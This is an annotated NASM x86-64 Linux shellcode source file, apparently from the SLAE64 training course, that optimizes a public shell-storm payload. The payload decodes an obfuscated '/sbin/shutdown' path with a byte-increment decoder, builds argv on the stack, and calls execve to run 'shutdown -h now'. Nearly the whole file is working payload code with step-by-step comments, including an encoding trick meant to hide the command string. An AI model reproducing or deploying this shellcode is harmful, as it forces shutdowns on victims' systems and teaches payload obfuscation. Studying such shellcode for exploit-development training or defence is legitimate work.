; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimization was performed on the
; original code, which left some space to do a basic decoding of the
; command (/sbin/shutdown). Each byte (except the first one) was
; decremented by 1. The decoder just adds 1 to each byte.
;
; ===================================================================

section .text

global _start

; -------------------------------------------------------------------
; Entry point.  NASM, Linux x86-64, raw syscall interface (no libc,
; no stack frame).  Ends in execve(path, argv, envp) with:
;   rdi = path  -> decoded in place from the bytes at c_1 (below)
;   rsi = argv  -> pointer array built on the stack
;   rdx = envp  -> NULL (rdx is zeroed once at entry and never
;                  written again by any instruction in this file)
; Scratch: rax, rbx (&"now"), rcx (&"-h", later the loop counter),
; flags.  If the syscall returns (execve failed), execution falls
; through to the shutdown: label and the decoder runs again on the
; already-decoded bytes, so the path is corrupted on each later pass.
; -------------------------------------------------------------------
_start:

xor rax, rax ; rax = 0
cdq ; edx = sign of eax = 0; the 32-bit write also zeroes rdx -> envp = NULL

; -------------------------------------------------------------------
; 1. store '-h' on stack
; -------------------------------------------------------------------

push rax ; 8 zero bytes: NUL terminator for the string pushed next
push word 0x682d ; bytes 2d 68 = "-h"; rsp now points at "-h\0"
push rsp
pop rcx ; rcx = &"-h"

; -------------------------------------------------------------------
; 2. store 'now' on stack
; -------------------------------------------------------------------

push rax ; NUL padding
push byte 0x77 ; imm8 is sign-extended to a qword: 'w' followed by 7 zero bytes
push word 0x6f6e ; bytes 6e 6f = "no"; memory now reads "now\0"
push rsp
pop rbx ; rbx = &"now"

; argv array.  Pushed high-to-low so the last push is the lowest slot:
;   [rsi+0]  = &"-h"   (argv[0] -- there is no separate program-name entry)
;   [rsi+8]  = &"now"  (argv[1])
;   [rsi+16] = NULL
; As laid out here the spawned program receives argc = 2, with "-h"
; occupying the argv[0] slot and "now" as its first real argument.
push rax
push rbx
push rcx

; -------------------------------------------------------------------
; 3. get the address of the encoded '/sbin/shutdown' and decode it
; -------------------------------------------------------------------

push rsp
pop rsi ; rsi = argv

push rax ; one more zero qword; nothing below reads it
jmp shutdown ; jmp-call-pop: 'call cont' pushes the address of c_1

cont:
pop rdi ; rdi = &c_1 (the encoded path bytes)

; Decoder.  'loop' decrements rcx first and exits when it hits 0, so the
; body runs for rcx = 15 .. 1: offsets 1..15 are each incremented by one,
; offset 0 (0x2f = '/') is left untouched.
push 15
pop rcx

do_add:
add byte [rdi+rcx], 0x01
loop do_add

; execve(rdi = path, rsi = argv, rdx = NULL)
push 59 ; __NR_execve on Linux x86-64
pop rax
syscall

shutdown:
call cont ; return address pushed here is the address of c_1
; Encoded path.  After the decoder has run, these 16 bytes read
; "///sbin/shutdown" (the extra leading slashes are accepted by the kernel).
; NOTE(review): the payload itself contains no terminating zero byte --
; execve only sees a correctly terminated path if the byte that follows
; c_1 in memory happens to be 0.
c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d